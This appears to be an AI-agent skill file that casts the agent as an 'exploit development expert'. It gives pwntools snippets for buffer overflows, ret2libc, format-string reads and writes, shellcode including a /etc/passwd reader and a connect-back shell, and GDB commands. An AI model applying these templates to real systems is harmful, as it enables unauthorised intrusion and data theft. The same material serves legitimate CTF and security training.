# exploit-dev-expert > Exploit development expert. Buffer overflow, shellcode, ROP, format strings, binary exploitation. Use for exploit writing and PoC development. - Author: Apex User - Repository: mahamaneharouna9-cpu/Apex-invoice-billing-automation - Version: 20260121053349 - Stars: 0 - Forks: 0 - Last Updated: 2026-02-06 - Source: https://github.com/mahamaneharouna9-cpu/Apex-invoice-billing-automation - Web: https://mule.run/skillshub/@@mahamaneharouna9-cpu/Apex-invoice-billing-automation~exploit-dev-expert:20260121053349 --- --- name: exploit-dev-expert description: >- Exploit development expert. Buffer overflow, shellcode, ROP, format strings, binary exploitation. Use for exploit writing and PoC development. --- # Exploit Development Expert ## Binary Exploitation Basics ### Buffer Overflow ```python from pwn import * # Find offset cyclic(200) # Generate pattern cyclic_find(0x61616166) # Find offset # Basic exploit offset = 64 ret_addr = p64(0x401234) payload = b'A' * offset + ret_addr # With NX bypass (ret2libc) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') system = libc.symbols['system'] bin_sh = next(libc.search(b'/bin/sh')) ``` ### Format String ```python # Read from stack payload = b'%x.' * 20 payload = b'%7$s' # Read specific position # Write to address payload = fmtstr_payload(offset, {target_addr: value}) ``` ## Shellcode ```python # Using pwntools context.arch = 'amd64' shellcode = asm(shellcraft.sh()) # Common shellcodes shellcraft.sh() # /bin/sh shellcraft.cat('/etc/passwd') shellcraft.connect('IP', PORT) ``` ## Pwntools Essentials ```python from pwn import * # Setup context.binary = ELF('./vuln') context.log_level = 'debug' # Connection p = process('./vuln') # Local p = remote('ip', port) # Remote p = gdb.debug('./vuln') # With GDB # I/O p.sendline(payload) p.recvuntil(b'>') data = p.recv(100) # Interactive p.interactive() ``` ## GDB Commands ```bash gdb ./binary > checksec # Security features > info functions # List functions > disas main # Disassemble > b *0x401234 # Breakpoint > r < payload.txt # Run with input > x/20wx $rsp # Examine stack ```